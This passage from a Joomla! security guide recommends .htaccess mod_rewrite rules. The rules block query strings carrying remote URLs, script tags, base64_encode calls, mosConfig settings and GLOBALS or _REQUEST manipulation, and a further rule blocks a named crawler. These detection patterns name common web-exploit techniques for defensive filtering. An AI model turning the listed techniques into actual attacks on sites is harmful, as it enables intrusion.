.htaccess
.htaccess
is a wonderful and powerful tool on which we'll spend a lot of time later, but for now, make sure you include the following code in yours. If you are not familiar with .htaccess
or if you have a default setup of Joomla! you will see in the root directory a file called htaccess.txt
. This file provides you the power to modify several things on the basis of a per directory file, notably the directives. Here is the portion you should be running. This has been included since Joomla! 1.0.11 in the base htaccess.txt
file. Check yours to ensure that you are running this highly valuable security measure.
########## Begin - Rewrite rules to block out some common exploits ## If you experience problems on your site block out the operations listed below ## This attempts to block the most common type of exploit `attempts` to Joomla! # #IF the URI contains a "http:" or "ftp:" or "https" RewriteCond %{QUERY_STRING} http\: [OR] RewriteCond %{QUERY_STRING} ftp\: [OR] RewriteCond %{QUERY_STRING} https\: [OR] #OR if the URI contains a "[" RewriteCond %{QUERY_STRING} \[ [OR] #OR if the URI contains a "]" RewriteCond %{QUERY_STRING} \] [OR] # Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR] # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR] # Block out any script that includes a <script> tag in URL RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Send all blocked request to homepage with 403 Forbidden error! RewriteRule ^(.*)$ index.php [F,L] # ########## End - Rewrite rules to block out some common exploits
You will need to append the previous code segment to the end of your .htaccess
file. If you haven't done so, please change the name from htaccess.txt
to .htaccess
.
This .htaccess
patch from the Joomla.org core team has proven its worth against a slew of attacks that are common. As you can read through, the RewriteCond
is being used to filter common attacks that could prove harmful to your site. The last line in the file:
RewriteRule ^(.*)$ index.php [F,L]
directs the system to forward all requests to damage your site to a : 403 Forbidden page.
Another interesting command you could add to your .htaccess
file is a set of commands to stop a specific robot, in our case "EvilRobot", from digging into the sensitive areas of your site.
RewriteCond %{HTTP_USER_AGENT} ^EvilRobot.* RewriteCond %{REMOTE_ADDR} ^123\.45\.67\.[8-9]$ RewriteRule ^/kljiwlslci/secret/data/.+ - [F]
Note
To learn more about the RewriteCond
and the RewriteRule
, visit the following links available from apache.org:
http://httpd.apache.org/docs/2.2/rewrite/
http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html#rewriterule